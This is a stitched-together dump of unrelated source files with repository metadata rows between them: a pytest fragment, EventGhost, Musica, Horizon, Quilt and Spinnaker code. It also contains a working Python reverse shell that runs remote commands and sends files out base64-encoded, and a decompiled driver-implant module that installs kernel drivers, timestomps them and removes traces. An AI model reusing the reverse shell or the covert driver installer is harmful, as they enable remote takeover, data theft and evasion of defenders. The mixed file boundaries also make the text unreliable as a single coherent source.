test_type_annotation="""
import pytest
from tornado.ioloop import IOLoop
@pytest.mark.gen_test
def test_type_attrib(io_loop: IOLoop):
pass # Only check that gen_test works
""",
)
# Run tests
result = testdir.runpytest_inprocess()
# Check tests went off as they should:
assert result.ret == 0
| apache-2.0 | -5,778,535,927,752,860,000 | 22.083333 | 75 | 0.633935 | false |
freezeeedos/revshelly | python_reverse_shell.py | 1 | 3523 | #!/usr/bin/python2
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Quentin Gibert
# All rights reserved.
# Based on the work of:
# David Kennedy: http://www.secmaniac.com/june-2011/creating-a-13-line-backdoor-worry-free-of-av/
# Xavier Garcia: www.shellguardians.com
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
import subprocess
import sys
import os
import time
import shlex
import base64
import re
HOST = '127.0.0.1' # The remote host
PORT = 8080 # The same port as used by the server
def connect((host, port)):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
return s
def wait_for_command(s):
s.send("[" + os.getcwd() + "]>")
data = s.recv(1024)
data_arr = shlex.split(data, posix=False)
if data == "quit\n":
s.close()
# the socket died
elif len(data)==0:
return True
elif (len(data_arr) > 1) and (data_arr[0] == "uu"):
for i in range(1, len(data_arr)):
            try:
                f = open(re.sub(r'''"''', '', data_arr[i]), 'rb')
            except IOError, e:
                s.send("=> " + str(e) + "\n")
                continue
            filename = re.sub('''"''', '', os.path.basename(data_arr[i]))
            try:
                # send the file base64-encoded between BEGIN/END markers
                fdata = f.read()
                f.close()
                s.send("BEGIN: " + filename + "\n")
                s.send(base64.encodestring(fdata))
                s.send("END: " + filename + "\n")
            except Exception, e:
                s.send("Unable to read " + filename + ": " + str(e) + "\n")
return False
elif (len(data_arr) > 1) and (data_arr[0] == "cd"):
try:
os.chdir(re.sub(r'''"''', '', data_arr[1]))
except Exception, cde:
s.send(str(cde) + "\n")
return False
else:
# do shell command
proc = subprocess.Popen(data, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
return False
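# Rough protocol sketch (illustrative, derived from wait_for_command above): once the
# shell connects back, the peer is shown a prompt of the form "[<cwd>]>" and may send
#   cd <dir>        change directory on this host
#   uu <file> ...   receive files base64-encoded between "BEGIN: <name>" / "END: <name>"
#   quit            close the connection
# anything else is executed through the shell and its output is echoed back.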
def main():
while True:
socked_died=False
try:
s=connect((HOST,PORT))
while not socked_died:
socked_died=wait_for_command(s)
s.close()
except socket.error:
pass
time.sleep(5)
if __name__ == "__main__":
sys.exit(main())
| mit | -661,312,054,476,301,800 | 32.552381 | 98 | 0.598354 | false |
WoLpH/EventGhost | eg/Classes/PluginItem.py | 1 | 6391 | # -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2016 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
import base64
import pickle
import wx
# Local imports
import eg
from ActionItem import ActionItem
from TreeItem import TreeItem
class PluginItem(ActionItem):
xmlTag = "Plugin"
icon = eg.Icons.PLUGIN_ICON
isRenameable = False
info = None
@eg.AssertInActionThread
def __init__(self, parent, node):
TreeItem.__init__(self, parent, node)
if node.text:
try:
args = pickle.loads(base64.b64decode(node.text))
except AttributeError:
args = ()
else:
args = ()
evalName = node.attrib.get('identifier', None)
self.pluginName = node.attrib.get('file', None)
guid = node.attrib.get('guid', self.pluginName)
self.info = info = eg.pluginManager.OpenPlugin(
guid,
evalName,
args,
self,
)
self.name = eg.text.General.pluginLabel % info.label
if info.icon != self.icon:
self.icon = eg.Icons.PluginSubIcon(info.icon)
#self.icon = info.icon
self.url = info.url
self.executable = info.instance
def AskCut(self):
return self.AskDelete()
def AskDelete(self):
actionItemCls = self.document.ActionItem
def SearchFunc(obj):
if obj.__class__ == actionItemCls:
if obj.executable and obj.executable.plugin == self.executable:
return True
return None
if self.root.Traverse(SearchFunc) is not None:
eg.MessageBox(
eg.text.General.deletePlugin,
eg.APP_NAME,
wx.NO_DEFAULT | wx.OK | wx.ICON_EXCLAMATION
)
return False
if not TreeItem.AskDelete(self):
return False
return True
@eg.AssertInActionThread
def Delete(self):
info = self.info
def DoIt():
info.Close()
info.instance.OnDelete()
info.RemovePluginInstance()
eg.actionThread.Call(DoIt)
ActionItem.Delete(self)
self.executable = None
self.info = None
@eg.AssertInActionThread
def Execute(self):
if not self.isEnabled:
return None, None
if eg.config.logActions:
self.Print(self.name)
if self.shouldSelectOnExecute:
wx.CallAfter(self.Select)
eg.indent += 1
self.info.Start()
eg.indent -= 1
eg.result = self.executable
return None, None
# The Find function calls this from MainThread, so we can't restrict this
# to the ActionThread
#@eg.AssertInActionThread
def GetArguments(self):
return self.info.args
def GetBasePath(self):
"""
Returns the filesystem path, where additional files (like pictures)
should be found.
Overrides ActionItem.GetBasePath()
"""
return self.info.path
def GetData(self):
attr, text = TreeItem.GetData(self)
del attr[0]
attr.append(('Identifier', self.executable.info.evalName))
guid = self.executable.info.guid
if guid:
attr.append(('Guid', guid))
attr.append(('File', self.pluginName))
text = base64.b64encode(pickle.dumps(self.info.args, 2))
return attr, text
def GetLabel(self):
return self.name
def GetTypeName(self):
return self.executable.info.name
def NeedsStartupConfiguration(self):
"""
Returns True if the item wants to be configured after creation.
Overrides ActionItem.NeedsStartupConfiguration()
"""
# if the Configure method of the executable is overriden, we assume
# the item wants to be configured after creation
return (
self.executable.Configure.im_func !=
eg.PluginBase.Configure.im_func
)
def RefreshAllVisibleActions(self):
"""
Calls Refresh() for all currently visible actions of this plugin.
"""
actionItemCls = self.document.ActionItem
plugin = self.info.instance
def Traverse(item):
if item.__class__ == actionItemCls:
if item.executable.plugin == plugin:
pass
#eg.Notify("NodeChanged", item)
else:
if item.childs and item in item.document.expandedNodes:
for child in item.childs:
Traverse(child)
Traverse(self.root)
@eg.LogIt
def RestoreState(self):
if self.isEnabled:
eg.actionThread.Call(self.info.Start)
@eg.LogIt
@eg.AssertInActionThread
def SetArguments(self, args):
info = self.info
if not info.lastException and args == self.info.args:
return
self.info.args = args
label = info.instance.GetLabel(*args)
if label != info.label:
info.label = label
self.name = eg.text.General.pluginLabel % label
#eg.Notify("NodeChanged", self)
self.RefreshAllVisibleActions()
if self.isEnabled:
eg.actionThread.Call(self.info.Stop)
eg.actionThread.Call(self.info.Start)
def SetAttributes(self, tree, itemId):
if self.info.lastException or self.info.initFailed:
tree.SetItemTextColour(itemId, eg.colour.pluginError)
@eg.AssertInActionThread
def SetEnable(self, flag=True):
ActionItem.SetEnable(self, flag)
if flag:
self.info.Start()
else:
self.info.Stop()
| gpl-2.0 | -8,394,167,896,932,475,000 | 30.019417 | 79 | 0.6 | false |
FabriceSalvaire/Musica | Musica/Geometry/Path.py | 1 | 2215 | ####################################################################################################
#
# Musica - A Music Theory Package for Python
# Copyright (C) 2017 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
####################################################################################################
from .Primitive import Primitive2D
from .Vector import Vector2D
####################################################################################################
class Polyline(Primitive2D):
#######################################
def __init__(self, *args):
""" Construct a :class:`Polyline` along points. """
if len(args) == 1:
self._points = [Vector2D(point) for point in args[0]]
else:
self._points = [Vector2D(point) for point in args]
##############################################
def clone(self):
return self.__class__(self._points)
##############################################
def __repr__(self):
return "{0.__class__.__name__} {0._points}".format(self)
##############################################
def transform(self, transformation):
points = transformation * self._points
return self.__class__(points)
##############################################
def __iter__(self):
return iter(self._points)
def __len__(self):
return len(self._points)
def __getitem__(self, _slice):
return self._points[_slice]
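# A minimal usage sketch (illustrative; assumes Vector2D accepts a point-like tuple,
# which matches how __init__ uses it above):
#
#   polyline = Polyline((0, 0), (10, 0), (10, 5))
#   len(polyline)   # 3
#   polyline[0]     # Vector2D for the first point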
| gpl-3.0 | 6,031,306,140,311,497,000 | 31.101449 | 100 | 0.463657 | false |
ikargis/horizon_fod | horizon/decorators.py | 1 | 3388 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 CRS4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
General-purpose decorators for use with Horizon.
"""
import functools
from django.utils.decorators import available_attrs # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
def _current_component(view_func, dashboard=None, panel=None):
"""Sets the currently-active dashboard and/or panel on the request."""
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if dashboard:
request.horizon['dashboard'] = dashboard
if panel:
request.horizon['panel'] = panel
return view_func(request, *args, **kwargs)
return dec
def require_auth(view_func):
"""Performs user authentication check.
Similar to Django's `login_required` decorator, except that this throws
:exc:`~horizon.exceptions.NotAuthenticated` exception if the user is not
signed-in.
"""
from horizon.exceptions import NotAuthenticated # noqa
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if request.user.is_authenticated():
return view_func(request, *args, **kwargs)
raise NotAuthenticated(_("Please log in to continue."))
return dec
def require_perms(view_func, required):
"""Enforces permission-based access controls.
:param list required: A tuple of permission names, all of which the request
user must possess in order access the decorated view.
Example usage::
from horizon.decorators import require_perms
@require_perms(['foo.admin', 'foo.member'])
def my_view(request):
...
Raises a :exc:`~horizon.exceptions.NotAuthorized` exception if the
requirements are not met.
"""
from horizon.exceptions import NotAuthorized # noqa
# We only need to check each permission once for a view, so we'll use a set
current_perms = getattr(view_func, '_required_perms', set([]))
view_func._required_perms = current_perms | set(required)
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if request.user.is_authenticated():
if request.user.has_perms(view_func._required_perms):
return view_func(request, *args, **kwargs)
raise NotAuthorized(_("You are not authorized to access %s")
% request.path)
# If we don't have any permissions, just return the original view.
if required:
return dec
else:
return view_func
| apache-2.0 | -4,795,479,006,821,248,000 | 35.042553 | 79 | 0.679752 | false |
quiltdata/quilt | api/python/quilt3/registry.py | 1 | 1604 | """
Microservice that provides temporary user credentials to the catalog
"""
from datetime import timedelta
import boto3
import requests
from botocore.exceptions import ClientError
from flask import Flask
from flask_cors import CORS
from flask_json import as_json
app = Flask(__name__) # pylint: disable=invalid-name
app.config['JSON_USE_ENCODE_METHODS'] = True
app.config['JSON_ADD_STATUS'] = False
sts_client = boto3.client( # pylint: disable=invalid-name
'sts',
)
class ApiException(Exception):
"""
Base class for API exceptions.
"""
def __init__(self, status_code, message):
super().__init__()
self.status_code = status_code
self.message = message
CORS(app, resources={"/api/*": {"origins": "*", "max_age": timedelta(days=1)}})
@app.route('/api/buckets', methods=['GET'])
@as_json
def list_buckets():
"""
Returns an empty list for compatibility
"""
return dict(
buckets=[]
)
@app.route('/api/auth/get_credentials', methods=['GET'])
@as_json
def get_credentials():
"""
Obtains credentials corresponding to your role.
    Returns a JSON object with the temporary credential fields produced by
    STS get_session_token:
        AccessKeyId(string): access key ID
        SecretAccessKey(string): secret access key
        SessionToken(string): session token
        Expiration(datetime): when these credentials expire
"""
try:
creds = sts_client.get_session_token()
except ClientError as ex:
print(ex)
raise ApiException(requests.codes.server_error,
"Failed to get credentials for your AWS Account.")
return creds['Credentials']
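# Illustrative request against a local run of this service (the host/port are Flask's
# defaults when app.run() is used below and are assumptions here):
#
#   curl http://127.0.0.1:5000/api/auth/get_credentials
#
# responds with the temporary credential fields described in get_credentials().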
if __name__ == '__main__':
app.run()
| apache-2.0 | -7,490,552,160,810,158,000 | 22.588235 | 79 | 0.642768 | false |
DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Lib/dsz/windows/driver/__init__.py | 1 | 11721 | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: __init__.py
import dsz
import dsz.file
import dsz.path
import dsz.version
def Install(project, driverName, localDriverName, startValue, typeValue, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if _isDriverSigningEnabled():
dsz.ui.Echo('* Cannot install because driver signing is enabled', dsz.ERROR)
return False
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
if ask and not dsz.ui.Prompt('Do you want to install the %s driver (%s.sys)?' % (project, driverName)):
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
if dsz.cmd.Run('registryquery -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s' % driverName):
dsz.ui.Echo('%s (%s.sys) is already installed (key exists)' % (project, driverName), dsz.ERROR)
return False
if dsz.file.Exists('%s.sys' % driverName, '%s\\drivers' % systemroot):
dsz.ui.Echo('%s (%s.sys) is already installed (file exists)' % (project, driverName), dsz.ERROR)
return False
dsz.ui.Echo('Uploading the SYS')
if dsz.cmd.Run('put "%s" -name "%s\\drivers\\%s.sys" -permanent -project %s' % (localDriverName, systemroot, driverName, project)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
dsz.ui.Echo('Matching file time for %s.sys' % driverName)
if dsz.version.checks.IsOs64Bit():
matchFile = '%s\\winlogon.exe' % systemroot
else:
matchFile = '%s\\user.exe' % systemroot
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s.sys"' % (matchFile, systemroot, driverName)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (but continuing anyway)', dsz.WARNING)
keysAdded = True
dsz.ui.Echo('Adding registry keys')
if not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s' % driverName):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value ErrorControl -type REG_DWORD -data 0' % driverName):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value Start -type REG_DWORD -data %u' % (driverName, startValue)):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value Type -type REG_DWORD -data %u' % (driverName, typeValue)):
keysAdded = False
if keysAdded:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
return True
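# Illustrative call (project, driver name and local path are placeholders):
#   Install('PROJECT', 'mydrv', 'D:\\payloads\\mydrv.sys', startValue=3, typeValue=1)
# uploads mydrv.sys into %SystemRoot%\drivers, matches its timestamps and creates the
# SYSTEM\CurrentControlSet\Services\mydrv registry keys.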
def Load(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
else:
dsz.ui.Echo('Loading %s' % driverName)
if dsz.cmd.Run('drivers -load %s' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
def Uninstall(project, driverName, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
rtn = True
if len(driverName) == 0:
dsz.ui.Echo('Invalid driver name given', dsz.ERROR)
return False
if ask and not dsz.ui.Prompt('Do you want to uninstall the %s driver (%s.sys)?' % (project, driverName)):
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
if not Unload(driverName):
rtn = False
dsz.ui.Echo('Removing registry key')
if dsz.cmd.Run('registrydelete -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -recursive' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
dsz.ui.Echo('Removing %s.sys' % driverName)
if dsz.cmd.Run('delete -file "%s\\drivers\\%s.sys"' % (systemroot, driverName)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
return rtn
def Unload(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
else:
dsz.ui.Echo('Unloading %s' % driverName)
if dsz.cmd.Run('drivers -unload %s' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
def VerifyInstall(driverName, startValue, typeValue):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
rtn = True
dsz.ui.Echo('Checking for %s.sys' % driverName)
if dsz.file.Exists('%s.sys' % driverName, '%s\\drivers' % systemroot):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
keyLoc = 'SYSTEM\\CurrentControlSet\\Services\\%s' % driverName
dsz.ui.Echo('Checking for key')
if dsz.cmd.Run('registryquery -hive L -key %s' % keyLoc):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/ErrorControl')
if dsz.cmd.Run('registryquery -hive L -key %s -value ErrorControl' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == 0:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/Start')
if dsz.cmd.Run('registryquery -hive L -key %s -value Start' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == startValue:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/Type')
if dsz.cmd.Run('registryquery -hive L -key %s -value Type' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == typeValue:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
return rtn
def VerifyRunning(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
dsz.ui.Echo('Getting driver list')
if dsz.cmd.Run('drivers -list -minimal', dsz.RUN_FLAG_RECORD):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (query of running drivers failed)', dsz.ERROR)
return False
try:
drivers = dsz.cmd.data.Get('DriverItem', dsz.TYPE_OBJECT)
except:
dsz.ui.Echo(' FAILED (failed to get driver list data)', dsz.ERROR)
return False
lowerDriverName = driverName.lower()
fullLowerDriverName = '%s.sys' % driverName.lower()
dsz.ui.Echo('Checking for %s' % driverName)
for driverObj in drivers:
try:
name = dsz.cmd.data.ObjectGet(driverObj, 'Name', dsz.TYPE_STRING)
namePieces = dsz.path.Split(name[0])
if namePieces[1].lower() == lowerDriverName or namePieces[1].lower() == fullLowerDriverName:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
except:
pass
dsz.ui.Echo(' FAILED (driver not running)', dsz.ERROR)
return False
def UpgradeDriver(project, drvName, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
systemRoot = dsz.path.windows.GetSystemPath()
tmpName = '%s32.sys' % drvName
dsz.ui.Echo('Move existing driver')
if not dsz.cmd.Run('move "%s\\drivers\\%s.sys" "%s\\drivers\\%s"' % (systemRoot, drvName, systemRoot, tmpName)):
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
dsz.ui.Echo(' MOVED', dsz.GOOD)
dsz.ui.Echo('Uploading the SYS file')
if not dsz.cmd.Run('put "%s.sys" -name "%s\\drivers\\%s.sys" -permanent -project %s' % (drvName, systemRoot, drvName, project)):
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.cmd.Run('move "%s\\drivers\\%s.sys" "%s\\drivers\\%s"' % (systemRoot, tmpName, systemRoot, drvName))
return False
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
if dsz.version.checks.IsOs64Bit():
matchFile = '%s\\winlogon.exe' % systemRoot
else:
matchFile = '%s\\user.exe' % systemRoot
dsz.ui.Echo('Matching file times for %s.sys with %s' % (drvName, matchFile))
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s.sys"' % (matchFile, systemRoot, drvName)):
dsz.ui.Echo(' MATCHED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.WARNING)
dsz.ui.Echo('Matching file times for %s with %s' % (tmpName, matchFile))
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s"' % (matchFile, systemRoot, tmpName)):
dsz.ui.Echo(' MATCHED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.WARNING)
dsz.ui.Echo('Deleting existing driver')
if dsz.cmd.Run('delete -file "%s\\drivers\\%s" -afterreboot' % (systemRoot, tmpName)):
dsz.ui.Echo(' MOVED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.ui.Echo('Upgrade complete (reboot required)')
return True
def _isDriverSigningEnabled():
if dsz.version.checks.windows.IsVistaOrGreater():
if dsz.version.checks.IsOs64Bit():
return True
    return False
| unlicense | 6,155,391,410,086,799,000 | 38.073333 | 158 | 0.594233 | false |
Roshan2017/spinnaker | dev/generate_bom.py | 1 | 12830 | #!/usr/bin/python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import datetime
import os
import socket
import sys
import yaml
from annotate_source import Annotator
from spinnaker.run import run_quick
SERVICES = 'services'
VERSION = 'version'
GOOGLE_CONTAINER_BUILDER_SERVICE_BASE_CONFIG = {
'steps': [
{
'name': 'java:8',
'env': ['GRADLE_USER_HOME=cache'],
'args': []
},
{
'name': 'gcr.io/cloud-builders/docker',
'args': []
}
],
'images': [],
'timeout': '3600s'
}
GOOGLE_CONTAINER_BUILDER_MONITORING_BASE_CONFIG = {
'steps': [
{
'name': 'gcr.io/cloud-builders/docker',
'dir': 'spinnaker-monitoring-daemon',
'args': []
}
],
'images': [],
'timeout': '3600s'
}
class BomGenerator(Annotator):
"""Provides facilities for generating the Bill of Materials file for the
Spinnaker product release.
This assumes Halyard (https://github.com/spinnaker/halyard) is installed on
the machine this script runs on.
"""
COMPONENTS = [
'clouddriver',
'deck',
'echo',
'front50',
'gate',
'igor',
'orca',
'rosco',
'fiat',
'spinnaker-monitoring',
'spinnaker'
]
def __init__(self, options):
self.__base_dir = options.base_dir
self.__docker_registry = options.docker_registry
self.__bom_file = ''
self.__component_versions = {}
self.__changelog_start_hashes = {} # Hashes to start from when generating changelogs.
self.__toplevel_version = ''
self.__changelog_output = options.changelog_output
self.__alias = options.bom_alias
super(BomGenerator, self).__init__(options)
@classmethod
def init_argument_parser(cls, parser):
"""Initialize command-line arguments."""
parser.add_argument('--base_dir', default='.', required=True,
help="Base directory containing the component's git repositories as subdirectories.")
parser.add_argument('--container_builder', default='gcb',
help="Type of builder to use. Currently, the supported options are {'gcb', 'docker'}.")
parser.add_argument('--docker_registry', default='',
help="Docker registry to push the container images to.")
parser.add_argument('--changelog_output', default='',
help="Output file to write the changelog to.")
parser.add_argument('--bom_alias', default='',
help="Alias to rename the 'real' BOM as. This also sets the Spinnaker version as the alias.")
super(BomGenerator, cls).init_argument_parser(parser)
def __version_from_tag(self, comp):
"""Determine the component version from the 'version-X.Y.Z' git tag.
Args:
comp [string]: Spinnaker component name.
Returns:
[string] Component version with build number and without 'version-'.
"""
version_bump = self.__component_versions[comp]
next_tag_with_build = '{0}-{1}'.format(version_bump.version_str,
self.build_number)
first_dash_idx = next_tag_with_build.index('-')
return next_tag_with_build[first_dash_idx + 1:]
def write_container_builder_gcr_config(self):
"""Write a configuration file for producing Container Images with Google Container Builder for each microservice.
"""
for comp in self.__component_versions:
if comp == 'spinnaker-monitoring':
config = dict(GOOGLE_CONTAINER_BUILDER_MONITORING_BASE_CONFIG)
version = self.__version_from_tag(comp)
versioned_image = '{reg}/monitoring-daemon:{tag}'.format(reg=self.__docker_registry,
tag=version)
config['steps'][0]['args'] = ['build', '-t', versioned_image, '-f', 'Dockerfile', '.']
config['images'] = [versioned_image]
config_file = '{0}-gcb.yml'.format(comp)
with open(config_file, 'w') as cfg:
yaml.dump(config, cfg, default_flow_style=True)
elif comp == 'spinnaker':
pass
else:
config = dict(GOOGLE_CONTAINER_BUILDER_SERVICE_BASE_CONFIG)
gradle_version = self.__version_from_tag(comp)
gradle_cmd = ''
if comp == 'deck':
gradle_cmd = './gradlew build -PskipTests'
else:
gradle_cmd = './gradlew {0}-web:installDist -x test'.format(comp)
config['steps'][0]['args'] = ['bash', '-c', gradle_cmd]
versioned_image = '{reg}/{repo}:{tag}'.format(reg=self.__docker_registry,
repo=comp,
tag=gradle_version)
config['steps'][1]['args'] = ['build', '-t', versioned_image, '-f', 'Dockerfile.slim', '.']
config['images'] = [versioned_image]
config_file = '{0}-gcb.yml'.format(comp)
with open(config_file, 'w') as cfg:
yaml.dump(config, cfg, default_flow_style=True)
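  # For a service such as "echo", the generated echo-gcb.yml contains roughly the
  # following (illustrative; the registry/tag values are placeholders and the real
  # file is emitted in YAML flow style, expanded here for readability):
  #
  #   images: [gcr.io/example/echo:1.2.3-456]
  #   steps:
  #   - args: [bash, -c, ./gradlew echo-web:installDist -x test]
  #     env: [GRADLE_USER_HOME=cache]
  #     name: java:8
  #   - args: [build, -t, gcr.io/example/echo:1.2.3-456, -f, Dockerfile.slim, .]
  #     name: gcr.io/cloud-builders/docker
  #   timeout: 3600s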
def write_docker_version_files(self):
"""Write a file containing the full tag for each microservice for Docker.
"""
for comp in self.__component_versions:
